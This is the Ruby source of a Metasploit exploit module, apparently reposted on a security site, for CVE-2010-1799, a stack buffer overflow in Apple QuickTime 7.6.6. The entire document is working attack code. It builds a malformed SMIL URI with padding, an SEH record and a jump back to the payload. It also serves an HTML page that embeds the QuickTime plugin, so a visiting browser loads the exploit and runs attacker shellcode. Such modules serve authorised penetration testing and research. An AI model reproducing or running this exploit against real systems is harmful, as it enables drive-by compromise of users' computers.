The Enigma Group

Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow


##

# $Id: apple_quicktime_smil_debug.rb 11513 2011-01-08 00:25:44Z jduck $

##



##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##



require 'msf/core'



class Metasploit3 < Msf::Exploit::Remote

    Rank = GoodRanking # needs more testing/targets to be Great



    include Msf::Exploit::Remote::HttpServer::HTML

    include Msf::Exploit::Seh



    include Msf::Exploit::Remote::BrowserAutopwn

    autopwn_info({

        :os_name    => OperatingSystems::WINDOWS,

        :javascript => true,

        :rank       => NormalRanking, # reliable memory corruption

        :vuln_test  => nil,

    })



    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',

            'Description'    => %q{

                    This module exploits a buffer overflow in Apple QuickTime

                7.6.6. When processing a malformed SMIL uri, a stack-based buffer

                overflow can occur when logging an error message.

            },

            'Author'         =>

                [

                    'Krystian Kloskowski',  # original discovery

                    'jduck'                 # Metasploit module

                ],

            'License'        => MSF_LICENSE,

            'Version'        => '$Revision: 11513 $',

            'References'     =>

                [

                    [ 'CVE', '2010-1799' ],

                    [ 'OSVDB', '66636'],

                    [ 'BID', '41962' ],

                    [ 'URL', 'http://secunia.com/advisories/40729/' ],

                    [ 'URL', 'http://support.apple.com/kb/HT4290' ]

                ],

            'DefaultOptions' =>

                {

                    'EXITFUNC' => 'process',

                    'InitialAutoRunScript' => 'migrate -f',

                },

            'Payload'        =>

                {

                    'Space'    => 640, # 716 - 63 - 8 - 5

                    'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",

                },

            'Platform' => 'win',

            'Targets'  =>

                [

                    #[ 'Automatic', { } ],

                    [ 'Apple QuickTime Player 7.6.6',

                        {

                            'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)

                        }

                    ],

                ],

            'Privileged'     => false,

            'DisclosureDate' => 'Aug 12 2010',

            'DefaultTarget'  => 0))

    end



    def on_request_uri(client, request)



        return if ((p = regenerate_payload(client)) == nil)



        if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)

            print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")

            print_status("Trying target #{target.name}...")



            # This is all basically filler on the browser target because we can't

            # expect the SEH to be in a reliable place across multiple browsers.

            # Heap spray ftw.



            off = 716

            start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"



            scheme = rand_text_alphanumeric(5)



            sploit = ''

            sploit << scheme

            sploit << "://"



            # payload

            sploit << p.encoded



            # pad to SEH

            sploit << rand_text_english(off - sploit.length - start.length)



            # seh frame

            sploit << generate_seh_record(target.ret)



            # jmp back to payload

            distance = off + 8 - (8 + start.length)

            sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string



            # force exception while writing

            sploit << rand_text(1024) * 15



            smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">

<body>

<img src="#{sploit}" />

</body>

</smil>

|

            send_response(client, smil, { 'Content-Type' => "application/smil" })



        else

            print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")



            shellcode = Rex::Text.to_unescape(p.encoded)

            url =  ((datastore['SSL']) ? "https://" : "http://")

            url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])

            url << ":" + datastore['SRVPORT']

            url << get_resource



            fname = rand_text_alphanumeric(4)



            content =  "<html><body>"

            content << <<-ENDEMBED

                    <OBJECT

                    CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"

                    WIDTH="1"

                    HEIGHT="1"

                    CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">

                    <PARAM name="SRC"        VALUE = "#{url}/#{fname}.smil">

                    <PARAM name="QTSRC"      VALUE = "#{url}/#{fname}.smil">

                    <PARAM name="AUTOPLAY"   VALUE = "true"               >

                    <PARAM name="TYPE"       VALUE = "video/quicktime"    >

                    <PARAM name="TARGET"     VALUE = "myself"             >

                    <EMBED

                        SRC        = "#{url}/#{fname}.qtl"

                        QTSRC      = "#{url}/#{fname}.qtl"

                        TARGET     = "myself"

                        WIDTH      = "1"

                        HEIGHT     = "1"

                        AUTOPLAY   = "true"

                        PLUGIN     = "quicktimeplugin"

                        TYPE       = "video/quicktime"

                        CACHE      = "false"

                        PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >

                    </EMBED>

                    </OBJECT>

                ENDEMBED

            content << "</body></html>"



            send_response(client, content, { 'Content-Type' => "text/html" })

        end



        # Handle the payload

        handler(client)

    end



end